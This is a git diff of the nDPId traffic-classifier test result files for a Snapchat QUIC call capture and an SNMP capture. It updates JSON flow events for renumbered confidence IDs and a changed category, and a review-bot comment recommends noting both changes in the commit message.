02281{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"snapchat_call.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1595865799037,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1595865799037,"pkt":"mt9Y+uvcCL6sCxduCABFAAVi60BAACUR+rISuIqOwKgMqQG7pGMFThqhw1EwNDYFw4BG53qjBuoAAAABHHnqt4ztMz51vP6XgAFSRUoABwAAAFNUSwA5AAAAU05PAG0AAABQUk9GtAAAAFNDRkc7AQAAUlJFSj8BAABTVFRMRwEAAENSVP9OBwAAbUU2ixV5Jj1qHEQQZYOHtdotUTPKCy0omzKN6SE7STZ4\/rKMxZ9\/rrj8l9tx+PhU9mRQzeJZ+1Dabp0JaMw4Ax2lLo8wBUBdtg1GpS3urBIhqVx\/8nRPLB1cTLrUpB570Ce5EPUwnKR9lOYP4jBFAiB3SpfbIfQpyAe+ZsA1KXWbSYFVXmlAhM9hKVIcNwAFzwIhAKINNKjm9Y0DRmywB4GeockL0Y3PJJ2PTHmxvqAl6rucU0NGRwYAAABBRUFECAAAAFNDSUQYAAAAUFVCUzsAAABLRVhTPwAAAE9CSVRHAAAARVhQWU8AAABBRVNHQ0MyMAO\/Pud+GiRqUM930xoSwNMgAAAzgoMwBXTcjfX\/uLgWESbe\/GDn3+Z5Wy5eude5hIrxK0MyNTUy3iwBeDJ0hdzKD01zAQAADAAAAHLO80MAAAAAAQEA6ggAAHi7IlF+sTNiZQCWXKx6Bk0smxcAyyAmJgFO2z2LJtgwHuFZfF6JuflcqgEXGwewWDpny8LMbOCDWiSJGghD0i2PS2Z6Jqg4ACVbQzWg\/8FJRBYu7OrsjFmUAwsFIwNgXkJkLSMjUNYyNAJzDVJQbYOmUQ5hLmdg+knLL8rLTIQ5gV2YJzgxryRRwTc\/Dxh4hkIGAhCXcQbnJRZAMhNUKTMPj5YeMFhzMstS9TLzDSKBwuxgHzIxQr3KzMjO7MTA0igTPiXBhk\/onni666rTEwW2GV7P0HIt5RAIXKgqHG0lyz+LaQ37Sb9X68wmMzzfpJMbI+6\/war2EINr2z3pHSav6hc3MccaNDFHokTO4rnP5H\/esvQ\/kPdi4umpS28ZPuKaj1RHBL7\/ujNAPVOn37WS752O83bRN1k7DJRB0oIsMgZSTShub+JC8gdKYcjeQKjszISUlUkGCQZ6C3QWaLVpIMpKY72UTKR8UVycnKibmpysm24IrtEw1JvgV+8DKQhdDZyBxSOkYfA3h5ERX\/GLYp5zQLABBxtbeiMPMIEaVCPltXyDXNx5DdkMA1ekvGYJc3kiSLoY1TJYkgWmWEiCRSp3StBqrCbGWjYucEl5rZKJhYmliTEXiDMZ0xnKGNyWhr4u\/TVRwWDros7ML59rBXUcS\/b99dzRuvrTn4J\/ue4MDIyF97xNnBgYWJgZ3A1cmRQZZl+WnuB1dsnif3fPXLu66NVPttQQNgnXFyeSpjbviVMPvsSkkKnJ8SbX7sSrj30mcX6\/VAWXm72+rLYpIjtI\/4Pe2rlv1IH2Krm6skeGqoRNs1+o\/\/F7btsDZbXktQe862OPNcfkPeJngtqrDrdXwUB1507jl12PbQL\/ybLt+9VWcsd2\/4OdQYxPekSfzHnGdBnksoD\/k8V3L9Lbv0bDO\/WlV93k58q8IeJ7Shd\/k5gaMNlDhaG
UIXDxhq9\/GSvnhOXuMK\/o51lSdUZa\/fT3eR1Os3j\/XelmfQq11x5sr5uBC5NC2tpbFwyfLJZe8nnhYvF5pYurJx\/i93xZwbWvt+mx29md\/5kUgrJ0vgl\/6lq870XJzFvZL9lvZZeX8D\/9s4v3bXp609M\/CshlE3Mmg0EakyHDDbOtMsq6skVXu5mVPu76eNXwNe+pKj\/OfovXBece+Cifdpz8TnOjJcPFhjtTSzUqxSSAWrZv6p0iOl+y6nXK3m9XXNa84pm1qPWQefDM"} 02255{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"snapchat_call.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1595865799037,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1595865799037,"pkt":"mt9Y+uvcCL6sCxduCABFAAVi60FAACUR+rESuIqOwKgMqQG7pGMFTlWjw1EwNDYFw4BG53qjBuoAAAACYTy54mZ50XnS5MjxpAEFJgJoF8maXr+sg1zn\/py4s01uT+X8o3fm32Z\/27aBGVRqMq8xaGKaAi01uU5r7HKLe2rJUVZS8PnsMSHkxhwPsDGXSFTBCa1buYUF0POAoYKBHKRMFYfrgNSNCkH5+SWw9rKxgbGBBbT4BJamyFwql91lwAIWXmqyajeyMCgxJzGwPOJwelV+Q+XeAp2UJcLnHOYoF61k4uIzt1c029EbLPLt6sSp3p+nMfUWyh25cXr5\/Lj3C57VR00SnBac\/\/rAaft1f6Pt3VWez2LXm7Zvhf7ucIn1hUv2VljJvYi2yU4R1D5jot2zuIlREZjtZA2E4BmRw4ANSDEBW4soJSBjm4EJUkmhYaBGZEnhBCkYrUGNuQWmC4zbDHEWjLAggsQEKCIgzRMDW0iJZwas2ozYWIBMBpIKO0R1gLW2QK5OmO8FmIZd9Nmd9mHxI2npw9M32V4MRUt84P7L8a4Fzt5vSk4eXX1V3sDULG9GWLXHGtbkddWzwlXCz+T\/urc6d87xbbvenHt+qjjl9n0Wcy4Gz83289XWTuxReCHfwaf1O838hMGLS4dUlrt66L5iDPAynCJ8vzf+ltZuT5vEz5Un5qRNkpqm9aXaLGKxjqNAidTltx7bLu3uYnMtNBYwqKqaoXhXZeebOVsnsa9tPnYk60f5M9N9wvzqKZuc9ze\/LA+7zdE+xV3ka7zG+sUZPs39Cd+nNVS2ZpWpzZ3Ko8Dca\/euSiM1JW3JzeZXM0vO5vnWyrzu3XR0vZi034nPoa86LARNZAXX27Ov8M+6VCKor\/WneHv8IVFn1pxrtbeY9irN9r\/8sxwAcED2UAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":50,"source":"snapchat_call.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1595865799020,"flow_last_seen":1595865807311,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":10672,"flow_avg_l4_payload_len":213,"midstream":0,"thread_ts_msec":1595865807311,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.184.138.142","src_port":42083,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC.SnapchatCall","breed":"Acceptable","category":"Cloud"}} -00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":50,"source":"snapchat_call.pcapng","alias":"nDPId-test","packets-captured":50,"packets-processed":50,"total-skipped-flows":0,"total-l4-payload-len":10672,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1595865807311} 
+00811{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":20,"source":"snapchat_call.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1595865799020,"flow_last_seen":1595865799615,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":8282,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":1595865799615,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.184.138.142","src_port":42083,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"QUIC.SnapchatCall","breed":"Acceptable","category":"VoIP"},"quic": {}} +00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":50,"source":"snapchat_call.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1595865799020,"flow_last_seen":1595865807311,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":10672,"flow_avg_l4_payload_len":213,"midstream":0,"thread_ts_msec":1595865807311,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.184.138.142","src_port":42083,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"QUIC.SnapchatCall","breed":"Acceptable","category":"VoIP"}} 
+00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":50,"source":"snapchat_call.pcapng","alias":"nDPId-test","packets-captured":50,"packets-processed":50,"total-skipped-flows":0,"total-l4-payload-len":10672,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1595865807311} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 50/50 ~~ skipped flows.............: 0 @@ -15,10 +16,10 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5870893 bytes -~~ total memory freed........: 5870893 bytes -~~ total allocations/frees...: 118164/118164 +~~ total memory allocated....: 6004527 bytes +~~ total memory freed........: 6004527 bytes +~~ total allocations/frees...: 120926/120926 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 471 chars ~~ json string max len.......: 2286 chars -~~ json string avg len.......: 1362 chars +~~ json string avg len.......: 1370 chars diff --git a/test/results/snmp.pcap.out b/test/results/snmp.pcap.out index 42e62c2df..b63fd8097 100644 --- a/test/results/snmp.pcap.out +++ b/test/results/snmp.pcap.out 
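Review bot: The numeric key inside `"confidence"` changes from `"4"` to `"6"` for the same `"DPI"` label in the `detected` and `idle` expectations of this hunk, and the snmp.pcap.out hunk that follows shows the same change on every flow event. That suggests the bumped libnDPI renumbered its confidence values, so a consumer that matches on the number instead of the label would presumably misread each flow without raising an error. This hunk also moves `QUIC.SnapchatCall` from category `Cloud` to `VoIP` and adds a `detection-update` event at packet 20, which changes what category-based filters and alerting rules will see for the same traffic. I would record both in the commit description, for example `confidence ids renumbered upstream (DPI: 4 -> 6); match on the label, not the id` and `SnapchatCall category: Cloud -> VoIP`.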
@@ -2,109 +2,109 @@ 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"snmp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1597326815572} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"snmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597326815572,"flow_last_seen":1597326815572,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1597326815572,"l3_proto":"ip4","src_ip":"176.211.60.43","dst_ip":"97.0.115.163","src_port":43015,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"snmp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1597326815572,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1597326815572,"pkt":"AAAAmdpxAAwpCIFqCABFAABHM75AAEARRUaw0zwrYQBzo6gHAKEAM+IpMCkCAQAEBnB1YmxpY6EcAgRLeBpuAgEAAgEAMA4wDAYIKwYBAgEBBQAFAA=="} 
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"snmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597326815572,"flow_last_seen":1597326815572,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1597326815572,"l3_proto":"ip4","src_ip":"176.211.60.43","dst_ip":"97.0.115.163","src_port":43015,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"snmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597326815572,"flow_last_seen":1597326815572,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1597326815572,"l3_proto":"ip4","src_ip":"176.211.60.43","dst_ip":"97.0.115.163","src_port":43015,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"snmp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1597326815678,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":99,"pkt_l4_len":65,"thread_ts_msec":1597326815678,"pkt":"AAwpCIFqAAAAmdpxCABFAABVAAIAAP8R+fNhAHOjsNM8KwChqAcAQdFWMDcCAQAEBnB1YmxpY6IqAgRLeBpuAgEAAgEAMBwwGgYIKwYBAgEBBgAEDkdsb2JvbWFudGljc0hR"} 
-00643{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"snmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1597326815572,"flow_last_seen":1597326815678,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1597326815678,"l3_proto":"ip4","src_ip":"176.211.60.43","dst_ip":"97.0.115.163","src_port":43015,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00643{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"snmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1597326815572,"flow_last_seen":1597326815678,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1597326815678,"l3_proto":"ip4","src_ip":"176.211.60.43","dst_ip":"97.0.115.163","src_port":43015,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"snmp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1597326815679,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1597326815679,"pkt":"AAAAmdpxAAwpCIFqCABFAABHM+lAAEARRRuw0zwrYQBzo6gHAKEAM+EqMCkCAQAEBnB1YmxpY6AcAgRLeBpvAgEAAgEAMA4wDAYIKwYBAgEBBQAFAA=="} 
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"snmp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597326838035,"flow_last_seen":1597326838035,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1597326838035,"l3_proto":"ip4","src_ip":"65.2.162.193","dst_ip":"130.70.149.185","src_port":59988,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"snmp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1597326838035,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1597326838035,"pkt":"AAAAl9K2AAwpQXJyCABFAABHTItAAEAR8ldBAqLBgkaVuepUAKEAM4b6MCkCAQEEBnB1YmxpY6EcAgRQZ9ZcAgEAAgEAMA4wDAYIKwYBAgEBBQAFAA=="} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"snmp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597326838035,"flow_last_seen":1597326838035,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1597326838035,"l3_proto":"ip4","src_ip":"65.2.162.193","dst_ip":"130.70.149.185","src_port":59988,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 
+00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"snmp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597326838035,"flow_last_seen":1597326838035,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1597326838035,"l3_proto":"ip4","src_ip":"65.2.162.193","dst_ip":"130.70.149.185","src_port":59988,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"snmp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1597326838141,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":99,"pkt_l4_len":65,"thread_ts_msec":1597326838141,"pkt":"AAwpQXJyAAAAl9K2CABFAABVAAQAAP8Rv9CCRpW5QQKiwQCh6lQAQXYnMDcCAQEEBnB1YmxpY6IqAgRQZ9ZcAgEAAgEAMBwwGgYIKwYBAgEBBgAEDkdsb2JvbWFudGljc0hR"} -00644{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"snmp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1597326838035,"flow_last_seen":1597326838141,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1597326838141,"l3_proto":"ip4","src_ip":"65.2.162.193","dst_ip":"130.70.149.185","src_port":59988,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 
+00644{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"snmp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1597326838035,"flow_last_seen":1597326838141,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1597326838141,"l3_proto":"ip4","src_ip":"65.2.162.193","dst_ip":"130.70.149.185","src_port":59988,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"snmp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1597326838143,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1597326838143,"pkt":"AAAAl9K2AAwpQXJyCABFAABHTNhAAEAR8gpBAqLBgkaVuepUAKEAM4X7MCkCAQEEBnB1YmxpY6AcAgRQZ9ZdAgEAAgEAMA4wDAYIKwYBAgEBBQAFAA=="} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"snmp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597326858008,"flow_last_seen":1597326858008,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1597326858008,"l3_proto":"ip4","src_ip":"176.211.60.43","dst_ip":"97.0.115.163","src_port":37224,"dst_port":161,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"snmp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1597326858008,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1597326858008,"pkt":"AAAAmdpxAAwpCIFqCABFAABHgc9AAEAR9zSw0zwrYQBzo5FoAKEAMzYdMCkCAQAEBnB1YmxpY6EcAgQJUAlZAgEAAgEAMA4wDAYIKwYBAgEBBAAFAA=="} -00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"snmp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597326858008,"flow_last_seen":1597326858008,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1597326858008,"l3_proto":"ip4","src_ip":"176.211.60.43","dst_ip":"97.0.115.163","src_port":37224,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"snmp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597326858008,"flow_last_seen":1597326858008,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1597326858008,"l3_proto":"ip4","src_ip":"176.211.60.43","dst_ip":"97.0.115.163","src_port":37224,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 
00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"snmp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1597326858136,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1597326858136,"pkt":"AAwpCIFqAAAAmdpxCABFAABTAAYAAP8R+fFhAHOjsNM8KwChkWgAP8oWMDUCAQAEBnB1YmxpY6IoAgQJUAlZAgEAAgEAMBowGAYIKwYBAgEBBQAEDFIxLmxhYi5sb2NhbA=="} -00643{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"snmp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1597326858008,"flow_last_seen":1597326858136,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1597326858136,"l3_proto":"ip4","src_ip":"176.211.60.43","dst_ip":"97.0.115.163","src_port":37224,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} +00643{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"snmp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1597326858008,"flow_last_seen":1597326858136,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1597326858136,"l3_proto":"ip4","src_ip":"176.211.60.43","dst_ip":"97.0.115.163","src_port":37224,"dst_port":161,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SNMP","breed":"Acceptable","category":"Network"}} 
